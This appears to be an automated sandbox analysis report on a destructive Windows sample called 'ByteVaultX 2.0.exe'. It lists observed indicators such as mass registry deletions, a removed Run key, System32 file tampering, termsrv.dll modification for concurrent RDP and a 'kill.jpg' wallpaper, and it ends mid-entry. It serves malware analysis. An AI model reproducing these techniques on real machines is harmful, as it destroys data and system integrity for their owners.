regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0271-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0376-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0231-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0250-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0358-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0212-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0079-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0096-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0215-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0042-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0355-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0211-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0183-ABCDEFFEDCBC}\InprocServer32 regedit.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
regedit.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run regedit.exe -
Drops desktop.ini file(s) 8 IoCs
Processes:
ByteVaultX 2.0.exedescription ioc process File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3076 powershell.exe 992 powershell.exe 4584 powershell.exe 2436 powershell.exe 5032 powershell.exe 2596 powershell.exe 428 powershell.exe 3556 powershell.exe 2964 powershell.exe 2948 powershell.exe 3652 powershell.exe 1560 powershell.exe 504 powershell.exe 5032 powershell.exe 4916 powershell.exe 1440 powershell.exe 4712 powershell.exe 4684 powershell.exe 1436 powershell.exe 4408 powershell.exe 2232 powershell.exe 2896 powershell.exe 4112 powershell.exe 968 powershell.exe 3832 powershell.exe 1576 powershell.exe 2240 powershell.exe 1420 powershell.exe 1788 powershell.exe 1936 powershell.exe 792 powershell.exe 1044 powershell.exe 5048 powershell.exe 3208 powershell.exe 4140 powershell.exe 4820 powershell.exe 2792 powershell.exe 292 powershell.exe 4684 powershell.exe 4196 powershell.exe 4708 powershell.exe 1416 powershell.exe 1804 powershell.exe 4232 powershell.exe 2964 powershell.exe 4880 powershell.exe 3996 powershell.exe 3532 powershell.exe 1968 powershell.exe 1564 powershell.exe 2640 powershell.exe 3348 powershell.exe 3472 powershell.exe 3556 powershell.exe 4176 powershell.exe 2964 powershell.exe 2232 powershell.exe 3860 powershell.exe 712 powershell.exe 2940 powershell.exe 4408 powershell.exe 3608 powershell.exe 4740 powershell.exe 4308 powershell.exe -
Drops file in System32 directory 64 IoCs
Processes:
cmd.execmd.exedescription ioc process File opened for modification C:\Windows\System32\es-ES\rdpcorets.dll.mui cmd.exe File opened for modification C:\Windows\System32\ja-jp\Windows.UI.Immersive.dll.mui cmd.exe File opened for modification C:\Windows\System32\KBDA1.DLL cmd.exe File opened for modification C:\Windows\Syswow64\it-IT\dmusic.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\uk-UA\TSWorkspace.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\wer.dll cmd.exe File opened for modification C:\Windows\Syswow64\wscadminui.exe cmd.exe File opened for modification C:\Windows\System32\ja-jp\shsvcs.dll.mui cmd.exe File opened for modification C:\Windows\System32\DRIVER~1\FILERE~1\ERRDEV~1.INF\errdev.sys cmd.exe File opened for modification C:\Windows\System32\pscript.sep cmd.exe File opened for modification C:\Windows\Syswow64\es-ES\credprovslegacy.dll.mui cmd.exe File opened for modification C:\Windows\System32\DRIVER~1\ja-JP\iaLPSS2i_GPIO2_BXT_P.inf_loc cmd.exe File opened for modification C:\Windows\System32\blbres.dll cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\printui.exe.mui cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\wlanmm.dll.mui cmd.exe File opened for modification C:\Windows\System32\bcdprov.dll cmd.exe File opened for modification C:\Windows\System32\de-DE\devmgr.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\NPSMDesktopProvider.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\fr-FR\wldap32.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\Speech\SpeechUX\ja-JP\sapi.cpl.mui cmd.exe File opened for modification C:\Windows\System32\TokenBrokerCookies.exe cmd.exe File opened for modification C:\Windows\Syswow64\it-IT\tcmsetup.exe.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\scrobj.dll.mui cmd.exe File opened for modification C:\Windows\System32\MFWMAAEC.DLL cmd.exe File opened for modification C:\Windows\System32\wbem\MDMSettingsProv.mof cmd.exe File opened for modification C:\Windows\Syswow64\Dism\fr-FR\AppxProvider.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\WINDOW~1\v1.0\Modules\NetLbfo\NetLbfo.Types.ps1xml cmd.exe File opened for modification C:\Windows\Syswow64\WINDOW~1\v1.0\Schemas\PSMaml\developerCommand.xsd cmd.exe File opened for modification C:\Windows\System32\mfdvdec.dll cmd.exe File opened for modification C:\Windows\System32\msftedit.dll cmd.exe File opened for modification C:\Windows\Syswow64\sk-SK\comctl32.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\WINDOW~1\v1.0\Modules\PSDESI~1\DSCRES~1\MSFT_P~1\en-US\PackageProvider.psd1 cmd.exe File opened for modification C:\Windows\System32\it-IT\mstsc.exe.mui cmd.exe File opened for modification C:\Windows\System32\joinutil.dll cmd.exe File opened for modification C:\Windows\Syswow64\it-IT\radardt.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\SyncSettings.dll.mui cmd.exe File opened for modification C:\Windows\System32\es-ES\wmerror.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\efsext.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\upnphost.dll.mui cmd.exe File opened for modification C:\Windows\System32\Windows.Media.Editing.dll cmd.exe File opened for modification C:\Windows\System32\Windows.UI.Immersive.dll cmd.exe File opened for modification C:\Windows\Syswow64\it-IT\profext.dll.mui cmd.exe File opened for modification C:\Windows\System32\de-DE\spp.dll.mui cmd.exe File opened for modification C:\Windows\System32\POINTO~1\PROTOC~1\en-US\PrinterProtocolProvider.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\uk-UA\winver.exe.mui cmd.exe File opened for modification C:\Windows\System32\en-US\hotplug.dll.mui cmd.exe File opened for modification C:\Windows\System32\it-IT\autoconv.exe.mui cmd.exe File opened for modification C:\Windows\System32\WINDOW~1\v1.0\Modules\PSDESI~1\DSCRES~1\MSFT_S~1\ja-JP\MSFT_ScriptResourceStrings.psd1 cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\tapi3.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\fr-FR\cmdkey.exe.mui cmd.exe File opened for modification C:\Windows\Syswow64\zh-CN\fms.dll.mui cmd.exe File opened for modification C:\Windows\System32\en-US\msg.exe.mui cmd.exe File opened for modification C:\Windows\System32\WINDOW~1\v1.0\Modules\NETWOR~3\MSFT_NetDnsTransitionMonitoring.format.ps1xml cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\nslookup.exe.mui cmd.exe File opened for modification C:\Windows\Syswow64\de-DE\webclnt.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\en-US\wevtapi.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\ja-JP\dsuiext.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\ja-JP\icsigd.dll.mui cmd.exe File opened for modification C:\Windows\System32\DRIVER~1\de-DE\wpdmtp.inf_loc cmd.exe File opened for modification C:\Windows\System32\en-US\PhoneUtil.dll.mui cmd.exe File opened for modification C:\Windows\System32\fr-FR\sens.dll.mui cmd.exe File opened for modification C:\Windows\System32\SecurityAndMaintenance.png cmd.exe File opened for modification C:\Windows\Syswow64\es-ES\rdvgumd32.dll.mui cmd.exe File opened for modification C:\Windows\Syswow64\Robocopy.exe cmd.exe -
Modifies termsrv.dll 1 TTPs 1 IoCs
Commonly used to allow simultaneous RDP sessions.
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\termsrv.dll cmd.exe -
Sets desktop wallpaper using registry 2 TTPs 14 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe -
Drops file in Windows directory 5 IoCs
Processes:
MicrosoftEdgeCP.exeSearchUI.exeMicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri SearchUI.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
SearchUI.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchUI.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchUI.exe -
Processes:
regedit.exeSearchUI.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\SQM regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\14 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\MenuExt regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\MINIE regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\ms-excel regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Desktop regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\38 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\PageSetup regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\28 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\ms-word regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\12 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\15 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\16 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\22 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\20 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\31 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\30 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\LinksBar regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\11 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\18 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\21 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Settings regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\TypedURLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\ProtocolExecute regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Zoom regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\IETld\LowMic regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Security regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\35 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\New Windows regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\ProtocolExecute\word regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\33 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Toolbar regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Help_Menu_URLs regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\26 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\7 regedit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\GPU SearchUI.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Desktop\General regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\29 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\37 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\8 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\5 regedit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Document Windows regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\23 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\4 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\19 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\9 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\InternetRegistry regedit.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\International\Scripts\13 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Suggested Sites regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Internet Explorer\Download regedit.exe -
Modifies registry class 64 IoCs
Processes:
regedit.exeMicrosoftEdge.exedescription ioc process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0142-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0158-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0223-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0301-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Schemas regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0000-0000-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0145-ABCDEFFEDCBC} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0357-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0095-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0178-ABCDEFFEDCBC}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0219-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0092-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0267-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0037-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ActivatableClasses\Package\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0013-0001-0067-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0000-0004-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0021-ABCDEFFEDCBB}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0079-ABCDEFFEDCBB} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0012-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Extensions\ContractId\Windows.ComponentUI\PackageId\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0014-0002-0053-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0016-0000-0073-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0017-0000-0356-ABCDEFFEDCBC} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0080-ABCDEFFEDCBA} regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0018-0000-0111-ABCDEFFEDCBA}\InprocServer32 regedit.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\CLSID\{CAFEEFAC-0015-0000-0024-ABCDEFFEDCBC} regedit.exe Key deleted 